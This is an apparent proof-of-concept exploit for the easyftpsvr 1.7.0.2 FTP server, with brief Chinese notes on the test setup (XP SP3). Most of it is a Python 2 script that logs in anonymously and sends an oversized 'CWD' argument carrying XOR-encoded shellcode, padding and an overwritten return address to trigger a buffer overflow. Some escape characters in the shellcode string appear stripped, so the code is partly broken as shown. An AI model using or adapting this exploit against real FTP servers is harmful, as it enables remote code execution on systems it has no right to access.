easyftpsvr-1.7.0.2 POC

程序是FTP软件

分析登陆发包情况

然后发送  'CWD XXXXXX' 造成溢出

熟悉 FTP命令！！

程序也有检测字符···

还不是很清楚  为什么 弹框没有显示字···························

环境   ：   XP SP3 中文   

easyftpsvr-1.7.0.2

import socket,sys
def ftp_test(ip,port):
	target = ip
	port = port
	shellcode = ('x50x20' 
'xD9xEE'           
'xD9x74x24xF4'     
'x58'                
'x83xC0x1b'     
'x33xC9'          
'x8Ax1Cx08'       
'x80xF3x11'        
'x88x1Cx08'      
'x41'             
'x80xFBx90'   
'x75xF1'  
'xedx79x7bx1bx29x0fx79x72x98xc0x5ex79x23x65x80x1d'  
'x9axe5x9cx6fxe5x22xcaxa6x15x3axf2x77xaax22x23x42'  
'x79x64x62x74x63x45x22xc3x75x9ax4bx21x9ax5ax1dx9a'  
'x58x0dx9ax18x9ax78x19xbcx2cx7bx1bx29x0fx64x14x84'  
'xeex46xe9x84x71x9ax54x2dx9ax5dx14x69x12xdcx9ax48'  
'x31x12xccx22xeex56x9ax25xaax12xe4x88x1exafx17x2b'  
'xd5x65x19xd0xdbx16x12xc1x57xfaxe0x2ax45x35x0dx64'  
'xf5x9ax48x35x12xccx77x9ax2dx6ax9ax48x0dx12xccx12'  
'x3dxaax84x4exbax46x70x2cx7bx1bx29x0fx64xb8x22xca'  
'x42x79x75x70x21x32x79x32x41x70x7fx9axd5x42x41x41'  
'x42xeex46xedx42xeex46xe9x81')#198


	buffer =  shellcode+'a'*(268-198)+'xa0x6fx5fx7d'
	#7D5F6FA0    59              pop ecx
	s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
	try:
		connect = s.connect((target,port))
		print "[+] Connected!"
	except:
		print "[!] Connection failed!"
		sys.exit(0)
	h = s.recv(1024)
	print h
	s.send('USER anonymous
')
	h = s.recv(1024)
	print h
	s.send('PASS anonymous
')
	h = s.recv(1024)
	print h
	print "[+] Sending buffer"
	s.send('CWD '+ buffer + '
')
	try:
		h = s.recv(1024)
		print h
		print "failed"
	except:
		print "ok"

if __name__ == '__main__':
	ftp_test('127.0.0.1',21)